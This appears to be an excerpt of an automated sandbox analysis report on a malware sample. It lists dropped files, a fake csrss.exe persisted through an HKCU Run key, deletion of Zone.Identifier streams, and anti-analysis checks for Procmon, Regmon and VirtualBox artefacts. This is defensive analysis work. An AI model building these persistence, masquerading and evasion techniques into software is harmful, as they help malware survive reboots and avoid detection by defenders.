                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-CV65T.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\bassmix.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\uchardet.dll (copy)Jump to dropped file
                                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gwsswwiJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\unins000.exe (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-95FJN.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64322\_bz2.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\bassdsd.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\pcm2dsd.exe (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-NJ5T1.tmpJump to dropped file
                                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8F78.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-ARAOP.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-PK59T.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\plugins\internal\is-HJRAJ.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-8RC7G.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-JNRFN.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\basswv.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64322\_socket.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\bass_fx.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-GR4AC.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-QG5TG.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-5KQFU.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\libFLAC_dynamic.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64322\VCRUNTIME140.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\plugins\internal\is-139BC.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\libvorbis.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\sd.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-OURMN.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-7D04O.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\ff_helper.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\bassalac.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-RL3ER.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\daiso.dll (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exeFile created: C:\ProgramData\PDiskSnap75\PDiskSnap75.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeFile created: C:\ProgramData\Drivers\csrss.exeJump to dropped file
                                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wesswwiJump to dropped file
                                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gwsswwiJump to dropped file

                                Boot Survival

                                barindex
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeWindow searched: window name: RegmonClass
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeWindow searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CSRSSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CSRSSJump to behavior

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\zrgv8wdmtr.exeJump to behavior
                                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\wesswwi:Zone.Identifier read attributes | deleteJump to behavior
                                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\gwsswwi:Zone.Identifier read attributes | deleteJump to behavior
                                Source: 8F78.exe, 00000007.00000002.3523875772.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: onion-port
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B33E10 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,8_2_00007FF6E1B33E10
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\E36B.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\E36B.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\E36B.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\E36B.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\FC24.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\is-EM1CB.tmp\FC24.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\is-EM1CB.tmp\FC24.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\is-EM1CB.tmp\FC24.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\FC24.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\AppData\Roaming\wesswwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\AppData\Roaming\wesswwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\AppData\Roaming\wesswwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\AppData\Roaming\wesswwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\AppData\Roaming\wesswwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\AppData\Roaming\wesswwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\CA06.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Users\user\AppData\Local\Temp\CA06.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Users\user\AppData\Local\Temp\CA06.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Users\user\AppData\Local\Temp\CA06.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Users\user\AppData\Local\Temp\CA06.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Users\user\AppData\Local\Temp\CA06.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Users\user\AppData\Roaming\gwsswwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Users\user\AppData\Roaming\gwsswwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Users\user\AppData\Roaming\gwsswwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Users\user\AppData\Roaming\gwsswwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Users\user\AppData\Roaming\gwsswwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Users\user\AppData\Roaming\gwsswwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeEvasive API call chain: GetComputerName,DecisionNodes,ExitProcessgraph_12-22530
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeSystem information queried: FirmwareTableInformation
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: ZRgv8wdMtR.exe, 00000000.00000002.1711018493.000000000095E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKS
                                Source: wesswwi, 00000003.00000002.1951462075.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, CA06.exe, 00000011.00000002.2192740476.0000000000A3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeSpecial instruction interceptor: First address: 000000000120AE6C instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
